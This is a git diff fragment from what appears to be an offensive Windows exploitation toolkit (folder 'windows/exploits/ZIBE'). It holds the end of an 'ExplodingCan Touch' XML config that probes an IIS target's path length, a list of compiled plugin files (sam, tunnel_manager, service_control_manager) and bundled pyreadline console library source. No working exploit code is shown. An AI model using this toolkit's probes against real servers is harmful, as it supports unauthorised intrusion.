displayname="ExplodingCan Touch"
|
||||
description="Determine the length of the path for IIS"
|
||||
postmessage="ExplodingCan requires the length of the IIS path">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="Protocol" value="Protocol"/>
|
||||
<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
|
||||
<t:ivparam name="maxSizeToCheck" value="maxSizeToCheck"/>
|
||||
<t:oparam name="IISPathSize" value="IISPathSize"/>
|
||||
<t:oparam name="hostString" value="hostString"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
BIN
windows/exploits/ZIBE/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/context_mgr.pyc
Normal file
BIN
windows/exploits/ZIBE/context_mgr.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/logs.pyc
Normal file
BIN
windows/exploits/ZIBE/logs.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugin_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugin_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/common.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/common.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/elist.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/elist.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/job_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/job_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/process_services.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/process_services.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/sam.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/sam.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/service_control_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/service_control_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/plugins/tunnel_manager.pyc
Normal file
BIN
windows/exploits/ZIBE/plugins/tunnel_manager.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/clipboard/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/clipboard/__init__.pyc
Normal file
Binary file not shown.
|
|
@ -0,0 +1,28 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import clr
|
||||
clr.AddReferenceByPartialName(u"System.Windows.Forms")
|
||||
import System.Windows.Forms.Clipboard as cb
|
||||
|
||||
def GetClipboardText():
|
||||
text = ""
|
||||
if cb.ContainsText():
|
||||
text = cb.GetText()
|
||||
|
||||
return text
|
||||
|
||||
def SetClipboardText(text):
|
||||
cb.SetText(text)
|
||||
|
||||
if __name__ == u'__main__':
|
||||
txt = GetClipboardText() # display last text clipped
|
||||
print txt
|
||||
|
||||
|
||||
|
||||
|
||||
18
windows/exploits/ZIBE/pyreadline/clipboard/no_clipboard.py
Normal file
18
windows/exploits/ZIBE/pyreadline/clipboard/no_clipboard.py
Normal file
|
|
@ -0,0 +1,18 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
|
||||
|
||||
mybuffer = u""
|
||||
|
||||
def GetClipboardText():
|
||||
return mybuffer
|
||||
|
||||
def SetClipboardText(text):
|
||||
global mybuffer
|
||||
mybuffer = text
|
||||
|
||||
BIN
windows/exploits/ZIBE/pyreadline/clipboard/win32_clipboard.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/clipboard/win32_clipboard.pyc
Normal file
Binary file not shown.
|
|
@ -0,0 +1,88 @@
|
|||
#Bind keys for exit (keys only work on empty lines
|
||||
#disable_readline(True) #Disable pyreadline completely.
|
||||
debug_output("off") #"on" saves log info to./pyreadline_debug_log.txt
|
||||
#"on_nologfile" only enables print warning messages
|
||||
bind_exit_key("Control-d")
|
||||
bind_exit_key("Control-z")
|
||||
|
||||
#Commands for moving
|
||||
bind_key("Home", "beginning_of_line")
|
||||
bind_key("End", "end_of_line")
|
||||
bind_key("Left", "backward_char")
|
||||
bind_key("Control-b", "backward_char")
|
||||
bind_key("Right", "forward_char")
|
||||
bind_key("Control-f", "forward_char")
|
||||
bind_key("Alt-f", "forward_word")
|
||||
bind_key("Alt-b", "backward_word")
|
||||
bind_key("Clear", "clear_screen")
|
||||
bind_key("Control-l", "clear_screen")
|
||||
bind_key("Control-a", "beginning_of_line")
|
||||
bind_key("Control-e", "end_of_line")
|
||||
#bind_key("Control-l", "redraw_current_line")
|
||||
|
||||
#Commands for Manipulating the History
|
||||
bind_key("Return", "accept_line")
|
||||
bind_key("Control-p", "previous_history")
|
||||
bind_key("Control-n", "next_history")
|
||||
bind_key("Up", "history_search_backward")
|
||||
bind_key("Down", "history_search_forward")
|
||||
bind_key("Alt-<", "beginning_of_history")
|
||||
bind_key("Alt->", "end_of_history")
|
||||
bind_key("Control-r", "reverse_search_history")
|
||||
bind_key("Control-s", "forward_search_history")
|
||||
bind_key("Alt-p", "non_incremental_reverse_search_history")
|
||||
bind_key("Alt-n", "non_incremental_forward_search_history")
|
||||
|
||||
bind_key("Control-z", "undo")
|
||||
bind_key("Control-_", "undo")
|
||||
|
||||
#Commands for Changing Text
|
||||
bind_key("Delete", "delete_char")
|
||||
bind_key("Control-d", "delete_char")
|
||||
bind_key("BackSpace", "backward_delete_char")
|
||||
#bind_key("Control-Shift-v", "quoted_insert")
|
||||
bind_key("Control-space", "self_insert")
|
||||
bind_key("Control-BackSpace", "backward_delete_word")
|
||||
|
||||
#Killing and Yanking
|
||||
bind_key("Control-k", "kill_line")
|
||||
bind_key("Control-shift-k", "kill_whole_line")
|
||||
bind_key("Escape", "kill_whole_line")
|
||||
bind_key("Meta-d", "kill_word")
|
||||
bind_key("Control-w", "unix_word_rubout")
|
||||
#bind_key("Control-Delete", "forward_kill_word")
|
||||
|
||||
#Copy paste
|
||||
bind_key("Shift-Right", "forward_char_extend_selection")
|
||||
bind_key("Shift-Left", "backward_char_extend_selection")
|
||||
bind_key("Shift-Control-Right", "forward_word_extend_selection")
|
||||
bind_key("Shift-Control-Left", "backward_word_extend_selection")
|
||||
bind_key("Control-m", "set_mark")
|
||||
|
||||
bind_key("Control-Shift-x", "copy_selection_to_clipboard")
|
||||
#bind_key("Control-c", "copy_selection_to_clipboard") #Needs allow_ctrl_c(True) below to be uncommented
|
||||
bind_key("Control-q", "copy_region_to_clipboard")
|
||||
bind_key('Control-Shift-v', "paste_mulitline_code")
|
||||
bind_key("Control-x", "cut_selection_to_clipboard")
|
||||
|
||||
bind_key("Control-v", "paste")
|
||||
bind_key("Control-y", "yank")
|
||||
bind_key("Alt-v", "ipython_paste")
|
||||
|
||||
#Unbinding keys:
|
||||
#un_bind_key("Home")
|
||||
|
||||
#Other
|
||||
bell_style("none") #modes: none, audible, visible(not implemented)
|
||||
show_all_if_ambiguous("on")
|
||||
mark_directories("on")
|
||||
completer_delims(" \t\n\"\\'`@$><=;|&{(?")
|
||||
complete_filesystem("off")
|
||||
debug_output("off")
|
||||
#allow_ctrl_c(True) #(Allows use of ctrl-c as copy key, still propagate keyboardinterrupt when not waiting for input)
|
||||
|
||||
history_filename("~/.pythonhistory")
|
||||
history_length(200) #value of -1 means no limit
|
||||
|
||||
#set_mode("vi") #will cause following bind_keys to bind to vi mode as well as activate vi mode
|
||||
#ctrl_c_tap_time_interval(0.3)
|
||||
30
windows/exploits/ZIBE/pyreadline/configuration/startup.py
Normal file
30
windows/exploits/ZIBE/pyreadline/configuration/startup.py
Normal file
|
|
@ -0,0 +1,30 @@
|
|||
# -*- coding: UTF-8 -*-
|
||||
# Example snippet to use in a PYTHONSTARTUP file
|
||||
try:
|
||||
import pyreadline.rlmain
|
||||
#pyreadline.rlmain.config_path=r"c:\xxx\pyreadlineconfig.ini"
|
||||
import readline,atexit
|
||||
import pyreadline.unicode_helper
|
||||
#
|
||||
#
|
||||
#Normally the codepage for pyreadline is set to be sys.stdout.encoding
|
||||
#if you need to change this uncomment the following line
|
||||
#pyreadline.unicode_helper.pyreadline_codepage="utf8"
|
||||
except ImportError:
|
||||
print "Module readline not available."
|
||||
else:
|
||||
#import tab completion functionality
|
||||
import rlcompleter
|
||||
|
||||
#Override completer from rlcompleter to disable automatic ( on callable
|
||||
completer_obj = rlcompleter.Completer()
|
||||
def nop(val, word):
|
||||
return word
|
||||
completer_obj._callable_postfix = nop
|
||||
readline.set_completer(completer_obj.complete)
|
||||
|
||||
#activate tab completion
|
||||
readline.parse_and_bind("tab: complete")
|
||||
readline.read_history_file()
|
||||
atexit.register(readline.write_history_file)
|
||||
del readline,rlcompleter,atexit
|
||||
BIN
windows/exploits/ZIBE/pyreadline/console/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/console/__init__.pyc
Normal file
Binary file not shown.
190
windows/exploits/ZIBE/pyreadline/console/ansi.py
Normal file
190
windows/exploits/ZIBE/pyreadline/console/ansi.py
Normal file
|
|
@ -0,0 +1,190 @@
|
|||
# -*- coding: ISO-8859-1 -*-
|
||||
import re,sys,os
|
||||
|
||||
terminal_escape = re.compile(u'(\001?\033\\[[0-9;]*m\002?)')
|
||||
escape_parts = re.compile(u'\001?\033\\[([0-9;]*)m\002?')
|
||||
|
||||
|
||||
class AnsiState(object):
|
||||
def __init__(self,bold=False,inverse=False,color=u"white",background=u"black",backgroundbold=False):
|
||||
self.bold = bold
|
||||
self.inverse = inverse
|
||||
self.color = color
|
||||
self.background = background
|
||||
self.backgroundbold = backgroundbold
|
||||
|
||||
trtable = {u"black":0, u"red":4, u"green":2, u"yellow":6,
|
||||
u"blue":1, u"magenta":5, u"cyan":3, u"white":7}
|
||||
revtable = dict(zip(trtable.values(),trtable.keys()))
|
||||
def get_winattr(self):
|
||||
attr = 0
|
||||
if self.bold:
|
||||
attr |= 0x0008
|
||||
if self.backgroundbold:
|
||||
attr |= 0x0080
|
||||
if self.inverse:
|
||||
attr |= 0x4000
|
||||
attr |= self.trtable[self.color]
|
||||
attr |= (self.trtable[self.background] << 4)
|
||||
return attr
|
||||
|
||||
def set_winattr(self, attr):
|
||||
self.bold = bool(attr & 0x0008)
|
||||
self.backgroundbold = bool(attr & 0x0080)
|
||||
self.inverse = bool(attr & 0x4000)
|
||||
self.color = self.revtable[attr & 0x0007]
|
||||
self.background = self.revtable[(attr & 0x0070) >> 4]
|
||||
|
||||
winattr=property(get_winattr,set_winattr)
|
||||
def __repr__(self):
|
||||
return u'AnsiState(bold=%s,inverse=%s,color=%9s,' \
|
||||
u'background=%9s,backgroundbold=%s)# 0x%x'% \
|
||||
(self.bold, self.inverse, '"%s"'%self.color,
|
||||
'"%s"'%self.background, self.backgroundbold,
|
||||
self.winattr)
|
||||
|
||||
def copy(self):
|
||||
x = AnsiState()
|
||||
x.bold = self.bold
|
||||
x.inverse = self.inverse
|
||||
x.color = self.color
|
||||
x.background = self.background
|
||||
x.backgroundbold = self.backgroundbold
|
||||
return x
|
||||
|
||||
defaultstate = AnsiState(False,False,u"white")
|
||||
|
||||
trtable = {0:u"black", 1:u"red", 2:u"green", 3:u"yellow",
|
||||
4:u"blue", 5:u"magenta", 6:u"cyan", 7:u"white"}
|
||||
|
||||
class AnsiWriter(object):
|
||||
def __init__(self, default=defaultstate):
|
||||
if isinstance(defaultstate, AnsiState):
|
||||
self.defaultstate = default
|
||||
else:
|
||||
self.defaultstate=AnsiState()
|
||||
self.defaultstate.winattr = defaultstate
|
||||
|
||||
|
||||
def write_color(self,text, attr=None):
|
||||
u'''write text at current cursor position and interpret color escapes.
|
||||
|
||||
return the number of characters written.
|
||||
'''
|
||||
if isinstance(attr,AnsiState):
|
||||
defaultstate = attr
|
||||
elif attr is None: #use attribute form initial console
|
||||
attr = self.defaultstate.copy()
|
||||
else:
|
||||
defaultstate = AnsiState()
|
||||
defaultstate.winattr = attr
|
||||
attr = defaultstate
|
||||
chunks = terminal_escape.split(text)
|
||||
n = 0 # count the characters we actually write, omitting the escapes
|
||||
res=[]
|
||||
for chunk in chunks:
|
||||
m = escape_parts.match(chunk)
|
||||
if m:
|
||||
parts = m.group(1).split(u";")
|
||||
if len(parts) == 1 and parts[0] == u"0":
|
||||
attr = self.defaultstate.copy()
|
||||
continue
|
||||
for part in parts:
|
||||
if part == u"0": # No text attribute
|
||||
attr = self.defaultstate.copy()
|
||||
attr.bold=False
|
||||
elif part == u"7": # switch on reverse
|
||||
attr.inverse=True
|
||||
elif part == u"1": # switch on bold (i.e. intensify foreground color)
|
||||
attr.bold=True
|
||||
elif len(part) == 2 and u"30" <= part <= u"37": # set foreground color
|
||||
attr.color = trtable[int(part) - 30]
|
||||
elif len(part) == 2 and u"40" <= part <= u"47": # set background color
|
||||
attr.backgroundcolor = trtable[int(part) - 40]
|
||||
continue
|
||||
n += len(chunk)
|
||||
if True:
|
||||
res.append((attr.copy(), chunk))
|
||||
return n,res
|
||||
|
||||
def parse_color(self,text, attr=None):
|
||||
n,res=self.write_color(text, attr)
|
||||
return n, [attr.winattr for attr, text in res]
|
||||
|
||||
def write_color(text, attr=None):
|
||||
a = AnsiWriter(defaultstate)
|
||||
return a.write_color(text, attr)
|
||||
|
||||
def write_color_old( text, attr=None):
|
||||
u'''write text at current cursor position and interpret color escapes.
|
||||
|
||||
return the number of characters written.
|
||||
'''
|
||||
res = []
|
||||
chunks = terminal_escape.split(text)
|
||||
n = 0 # count the characters we actually write, omitting the escapes
|
||||
if attr is None:#use attribute from initial console
|
||||
attr = 15
|
||||
for chunk in chunks:
|
||||
m = escape_parts.match(chunk)
|
||||
if m:
|
||||
for part in m.group(1).split(u";"):
|
||||
if part == u"0": # No text attribute
|
||||
attr = 0
|
||||
elif part == u"7": # switch on reverse
|
||||
attr |= 0x4000
|
||||
if part == u"1": # switch on bold (i.e. intensify foreground color)
|
||||
attr |= 0x08
|
||||
elif len(part) == 2 and u"30" <= part <= u"37": # set foreground color
|
||||
part = int(part)-30
|
||||
# we have to mirror bits
|
||||
attr = (attr & ~0x07) | ((part & 0x1) << 2) | (part & 0x2) | ((part & 0x4) >> 2)
|
||||
elif len(part) == 2 and u"40" <= part <= u"47": # set background color
|
||||
part = int(part) - 40
|
||||
# we have to mirror bits
|
||||
attr = (attr & ~0x70) | ((part & 0x1) << 6) | ((part & 0x2) << 4) | ((part & 0x4) << 2)
|
||||
# ignore blink, underline and anything we don't understand
|
||||
continue
|
||||
n += len(chunk)
|
||||
if chunk:
|
||||
res.append((u"0x%x"%attr, chunk))
|
||||
return res
|
||||
|
||||
|
||||
#trtable={0:"black",1:"red",2:"green",3:"yellow",4:"blue",5:"magenta",6:"cyan",7:"white"}
|
||||
|
||||
if __name__==u"__main__x":
|
||||
import pprint
|
||||
pprint=pprint.pprint
|
||||
|
||||
s=u"\033[0;31mred\033[0;32mgreen\033[0;33myellow\033[0;34mblue\033[0;35mmagenta\033[0;36mcyan\033[0;37mwhite\033[0m"
|
||||
pprint (write_color(s))
|
||||
pprint (write_color_old(s))
|
||||
s=u"\033[1;31mred\033[1;32mgreen\033[1;33myellow\033[1;34mblue\033[1;35mmagenta\033[1;36mcyan\033[1;37mwhite\033[0m"
|
||||
pprint (write_color(s))
|
||||
pprint (write_color_old(s))
|
||||
|
||||
s=u"\033[0;7;31mred\033[0;7;32mgreen\033[0;7;33myellow\033[0;7;34mblue\033[0;7;35mmagenta\033[0;7;36mcyan\033[0;7;37mwhite\033[0m"
|
||||
pprint (write_color(s))
|
||||
pprint (write_color_old(s))
|
||||
s=u"\033[1;7;31mred\033[1;7;32mgreen\033[1;7;33myellow\033[1;7;34mblue\033[1;7;35mmagenta\033[1;7;36mcyan\033[1;7;37mwhite\033[0m"
|
||||
pprint (write_color(s))
|
||||
pprint (write_color_old(s))
|
||||
|
||||
|
||||
if __name__==u"__main__":
|
||||
import console
|
||||
import pprint
|
||||
pprint=pprint.pprint
|
||||
|
||||
c=console.Console()
|
||||
c.write_color(u"dhsjdhs")
|
||||
c.write_color(u"\033[0;32mIn [\033[1;32m1\033[0;32m]:")
|
||||
print
|
||||
pprint (write_color(u"\033[0;32mIn [\033[1;32m1\033[0;32m]:"))
|
||||
|
||||
if __name__==u"__main__x":
|
||||
import pprint
|
||||
pprint=pprint.pprint
|
||||
s=u"\033[0;31mred\033[0;32mgreen\033[0;33myellow\033[0;34mblue\033[0;35mmagenta\033[0;36mcyan\033[0;37mwhite\033[0m"
|
||||
pprint (write_color(s))
|
||||
BIN
windows/exploits/ZIBE/pyreadline/console/console.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/console/console.pyc
Normal file
Binary file not shown.
|
|
@ -0,0 +1,16 @@
|
|||
|
||||
FOREGROUND_BLUE = 0x0001
|
||||
FOREGROUND_GREEN = 0x0002
|
||||
FOREGROUND_RED = 0x0004
|
||||
FOREGROUND_INTENSITY = 0x0008
|
||||
BACKGROUND_BLUE = 0x0010
|
||||
BACKGROUND_GREEN = 0x0020
|
||||
BACKGROUND_RED = 0x0040
|
||||
BACKGROUND_INTENSITY = 0x0080
|
||||
COMMON_LVB_LEADING_BYTE = 0x0100
|
||||
COMMON_LVB_TRAILING_BYTE = 0x0200
|
||||
COMMON_LVB_GRID_HORIZONTAL= 0x0400
|
||||
COMMON_LVB_GRID_LVERTICAL = 0x0800
|
||||
COMMON_LVB_GRID_RVERTICAL = 0x1000
|
||||
COMMON_LVB_REVERSE_VIDEO = 0x2000
|
||||
COMMON_LVB_UNDERSCORE = 0x4000
|
||||
52
windows/exploits/ZIBE/pyreadline/console/consolebase.py
Normal file
52
windows/exploits/ZIBE/pyreadline/console/consolebase.py
Normal file
|
|
@ -0,0 +1,52 @@
|
|||
class baseconsole:
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
def bell(self):
|
||||
raise NotImplementedError
|
||||
|
||||
def pos(self, x=None, y=None):
|
||||
u'''Move or query the window cursor.'''
|
||||
raise NotImplementedError
|
||||
|
||||
def size(self):
|
||||
raise NotImplementedError
|
||||
|
||||
def rectangle(self, rect, attr=None, fill=u' '):
|
||||
u'''Fill Rectangle.'''
|
||||
raise NotImplementedError
|
||||
|
||||
def write_scrolling(self, text, attr=None):
|
||||
u'''write text at current cursor position while watching for scrolling.
|
||||
|
||||
If the window scrolls because you are at the bottom of the screen
|
||||
buffer, all positions that you are storing will be shifted by the
|
||||
scroll amount. For example, I remember the cursor position of the
|
||||
prompt so that I can redraw the line but if the window scrolls,
|
||||
the remembered position is off.
|
||||
|
||||
This variant of write tries to keep track of the cursor position
|
||||
so that it will know when the screen buffer is scrolled. It
|
||||
returns the number of lines that the buffer scrolled.
|
||||
|
||||
'''
|
||||
raise NotImplementedError
|
||||
|
||||
def getkeypress(self):
|
||||
u'''Return next key press event from the queue, ignoring others.'''
|
||||
raise NotImplementedError
|
||||
|
||||
def write(self, text):
|
||||
raise NotImplementedError
|
||||
|
||||
def page(self, attr=None, fill=' '):
|
||||
u'''Fill the entire screen.'''
|
||||
raise NotImplementedError
|
||||
|
||||
def isatty(self):
|
||||
return True
|
||||
|
||||
def flush(self):
|
||||
pass
|
||||
|
||||
|
||||
BIN
windows/exploits/ZIBE/pyreadline/console/event.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/console/event.pyc
Normal file
Binary file not shown.
424
windows/exploits/ZIBE/pyreadline/console/ironpython_console.py
Normal file
424
windows/exploits/ZIBE/pyreadline/console/ironpython_console.py
Normal file
|
|
@ -0,0 +1,424 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
u'''Cursor control and color for the .NET console.
|
||||
'''
|
||||
|
||||
#
|
||||
# Ironpython requires a patch to work do:
|
||||
#
|
||||
# In file PythonCommandLine.cs patch line:
|
||||
# class PythonCommandLine
|
||||
# {
|
||||
|
||||
# to:
|
||||
# public class PythonCommandLine
|
||||
# {
|
||||
#
|
||||
#
|
||||
#
|
||||
# primitive debug printing that won't interfere with the screen
|
||||
|
||||
import clr,sys
|
||||
clr.AddReferenceToFileAndPath(sys.executable)
|
||||
import IronPythonConsole
|
||||
|
||||
import sys
|
||||
import re
|
||||
import os
|
||||
|
||||
import System
|
||||
|
||||
from event import Event
|
||||
from pyreadline.logger import log
|
||||
|
||||
from pyreadline.keysyms import \
|
||||
make_keysym, make_keyinfo, make_KeyPress, make_KeyPress_from_keydescr
|
||||
from pyreadline.console.ansi import AnsiState
|
||||
color = System.ConsoleColor
|
||||
|
||||
ansicolor={u"0;30": color.Black,
|
||||
u"0;31": color.DarkRed,
|
||||
u"0;32": color.DarkGreen,
|
||||
u"0;33": color.DarkYellow,
|
||||
u"0;34": color.DarkBlue,
|
||||
u"0;35": color.DarkMagenta,
|
||||
u"0;36": color.DarkCyan,
|
||||
u"0;37": color.DarkGray,
|
||||
u"1;30": color.Gray,
|
||||
u"1;31": color.Red,
|
||||
u"1;32": color.Green,
|
||||
u"1;33": color.Yellow,
|
||||
u"1;34": color.Blue,
|
||||
u"1;35": color.Magenta,
|
||||
u"1;36": color.Cyan,
|
||||
u"1;37": color.White
|
||||
}
|
||||
|
||||
winattr = {u"black" : 0, u"darkgray" : 0+8,
|
||||
u"darkred" : 4, u"red" : 4+8,
|
||||
u"darkgreen" : 2, u"green" : 2+8,
|
||||
u"darkyellow" : 6, u"yellow" : 6+8,
|
||||
u"darkblue" : 1, u"blue" : 1+8,
|
||||
u"darkmagenta" : 5, u"magenta" : 5+8,
|
||||
u"darkcyan" : 3, u"cyan" : 3+8,
|
||||
u"gray" : 7, u"white" : 7+8}
|
||||
|
||||
class Console(object):
|
||||
u'''Console driver for Windows.
|
||||
|
||||
'''
|
||||
|
||||
def __init__(self, newbuffer=0):
|
||||
u'''Initialize the Console object.
|
||||
|
||||
newbuffer=1 will allocate a new buffer so the old content will be restored
|
||||
on exit.
|
||||
'''
|
||||
self.serial = 0
|
||||
self.attr = System.Console.ForegroundColor
|
||||
self.saveattr = winattr[str(System.Console.ForegroundColor).lower()]
|
||||
self.savebg = System.Console.BackgroundColor
|
||||
log(u'initial attr=%s' % self.attr)
|
||||
|
||||
def _get(self):
|
||||
top = System.Console.WindowTop
|
||||
log(u"WindowTop:%s"%top)
|
||||
return top
|
||||
|
||||
def _set(self, value):
|
||||
top = System.Console.WindowTop
|
||||
log(u"Set WindowTop:old:%s,new:%s"%(top, value))
|
||||
|
||||
WindowTop = property(_get, _set)
|
||||
del _get, _set
|
||||
|
||||
def __del__(self):
|
||||
u'''Cleanup the console when finished.'''
|
||||
# I don't think this ever gets called
|
||||
pass
|
||||
|
||||
def pos(self, x=None, y=None):
|
||||
u'''Move or query the window cursor.'''
|
||||
if x is not None:
|
||||
System.Console.CursorLeft=x
|
||||
else:
|
||||
x = System.Console.CursorLeft
|
||||
if y is not None:
|
||||
System.Console.CursorTop=y
|
||||
else:
|
||||
y = System.Console.CursorTop
|
||||
return x, y
|
||||
|
||||
def home(self):
|
||||
u'''Move to home.'''
|
||||
self.pos(0, 0)
|
||||
|
||||
# Map ANSI color escape sequences into Windows Console Attributes
|
||||
|
||||
terminal_escape = re.compile(u'(\001?\033\\[[0-9;]*m\002?)')
|
||||
escape_parts = re.compile(u'\001?\033\\[([0-9;]*)m\002?')
|
||||
|
||||
# This pattern should match all characters that change the cursor position differently
|
||||
# than a normal character.
|
||||
motion_char_re = re.compile(u'([\n\r\t\010\007])')
|
||||
|
||||
def write_scrolling(self, text, attr=None):
|
||||
u'''write text at current cursor position while watching for scrolling.
|
||||
|
||||
If the window scrolls because you are at the bottom of the screen
|
||||
buffer, all positions that you are storing will be shifted by the
|
||||
scroll amount. For example, I remember the cursor position of the
|
||||
prompt so that I can redraw the line but if the window scrolls,
|
||||
the remembered position is off.
|
||||
|
||||
This variant of write tries to keep track of the cursor position
|
||||
so that it will know when the screen buffer is scrolled. It
|
||||
returns the number of lines that the buffer scrolled.
|
||||
|
||||
'''
|
||||
x, y = self.pos()
|
||||
w, h = self.size()
|
||||
scroll = 0 # the result
|
||||
|
||||
# split the string into ordinary characters and funny characters
|
||||
chunks = self.motion_char_re.split(text)
|
||||
for chunk in chunks:
|
||||
n = self.write_color(chunk, attr)
|
||||
if len(chunk) == 1: # the funny characters will be alone
|
||||
if chunk[0] == u'\n': # newline
|
||||
x = 0
|
||||
y += 1
|
||||
elif chunk[0] == u'\r': # carriage return
|
||||
x = 0
|
||||
elif chunk[0] == u'\t': # tab
|
||||
x = 8 * (int(x / 8) + 1)
|
||||
if x > w: # newline
|
||||
x -= w
|
||||
y += 1
|
||||
elif chunk[0] == u'\007': # bell
|
||||
pass
|
||||
elif chunk[0] == u'\010':
|
||||
x -= 1
|
||||
if x < 0:
|
||||
y -= 1 # backed up 1 line
|
||||
else: # ordinary character
|
||||
x += 1
|
||||
if x == w: # wrap
|
||||
x = 0
|
||||
y += 1
|
||||
if y == h: # scroll
|
||||
scroll += 1
|
||||
y = h - 1
|
||||
else: # chunk of ordinary characters
|
||||
x += n
|
||||
l = int(x / w) # lines we advanced
|
||||
x = x % w # new x value
|
||||
y += l
|
||||
if y >= h: # scroll
|
||||
scroll += y - h + 1
|
||||
y = h - 1
|
||||
return scroll
|
||||
|
||||
trtable = {0 : color.Black, 4 : color.DarkRed, 2 : color.DarkGreen,
|
||||
6 : color.DarkYellow, 1 : color.DarkBlue, 5 : color.DarkMagenta,
|
||||
3 : color.DarkCyan, 7 : color.Gray, 8 : color.DarkGray,
|
||||
4+8 : color.Red, 2+8 : color.Green, 6+8 : color.Yellow,
|
||||
1+8 : color.Blue, 5+8 : color.Magenta,3+8 : color.Cyan,
|
||||
7+8 : color.White}
|
||||
|
||||
def write_color(self, text, attr=None):
|
||||
'''write text at current cursor position and interpret color escapes.
|
||||
|
||||
return the number of characters written.
|
||||
'''
|
||||
log(u'write_color("%s", %s)' % (text, attr))
|
||||
chunks = self.terminal_escape.split(text)
|
||||
log(u'chunks=%s' % repr(chunks))
|
||||
bg = self.savebg
|
||||
n = 0 # count the characters we actually write, omitting the escapes
|
||||
if attr is None:#use attribute from initial console
|
||||
attr = self.attr
|
||||
try:
|
||||
fg = self.trtable[(0x000f&attr)]
|
||||
bg = self.trtable[(0x00f0&attr)>>4]
|
||||
except TypeError:
|
||||
fg = attr
|
||||
|
||||
for chunk in chunks:
|
||||
m = self.escape_parts.match(chunk)
|
||||
if m:
|
||||
log(m.group(1))
|
||||
attr = ansicolor.get(m.group(1), self.attr)
|
||||
n += len(chunk)
|
||||
System.Console.ForegroundColor = fg
|
||||
System.Console.BackgroundColor = bg
|
||||
System.Console.Write(chunk)
|
||||
return n
|
||||
|
||||
def write_plain(self, text, attr=None):
|
||||
u'''write text at current cursor position.'''
|
||||
log(u'write("%s", %s)' %(text, attr))
|
||||
if attr is None:
|
||||
attr = self.attr
|
||||
n = c_int(0)
|
||||
self.SetConsoleTextAttribute(self.hout, attr)
|
||||
self.WriteConsoleA(self.hout, text, len(text), byref(n), None)
|
||||
return len(text)
|
||||
|
||||
if os.environ.has_key(u"EMACS"):
|
||||
def write_color(self, text, attr=None):
|
||||
junk = c_int(0)
|
||||
self.WriteFile(self.hout, text, len(text), byref(junk), None)
|
||||
return len(text)
|
||||
write_plain = write_color
|
||||
|
||||
# make this class look like a file object
|
||||
def write(self, text):
|
||||
log(u'write("%s")' % text)
|
||||
return self.write_color(text)
|
||||
|
||||
#write = write_scrolling
|
||||
|
||||
def isatty(self):
|
||||
return True
|
||||
|
||||
def flush(self):
|
||||
pass
|
||||
|
||||
def page(self, attr=None, fill=u' '):
|
||||
u'''Fill the entire screen.'''
|
||||
System.Console.Clear()
|
||||
|
||||
def text(self, x, y, text, attr=None):
|
||||
u'''Write text at the given position.'''
|
||||
self.pos(x, y)
|
||||
self.write_color(text, attr)
|
||||
|
||||
def clear_to_end_of_window(self):
|
||||
oldtop = self.WindowTop
|
||||
lastline = self.WindowTop+System.Console.WindowHeight
|
||||
pos = self.pos()
|
||||
w, h = self.size()
|
||||
length = w - pos[0] + min((lastline - pos[1] - 1), 5) * w - 1
|
||||
self.write_color(length * u" ")
|
||||
self.pos(*pos)
|
||||
self.WindowTop = oldtop
|
||||
|
||||
def rectangle(self, rect, attr=None, fill=u' '):
|
||||
u'''Fill Rectangle.'''
|
||||
oldtop = self.WindowTop
|
||||
oldpos = self.pos()
|
||||
#raise NotImplementedError
|
||||
x0, y0, x1, y1 = rect
|
||||
if attr is None:
|
||||
attr = self.attr
|
||||
if fill:
|
||||
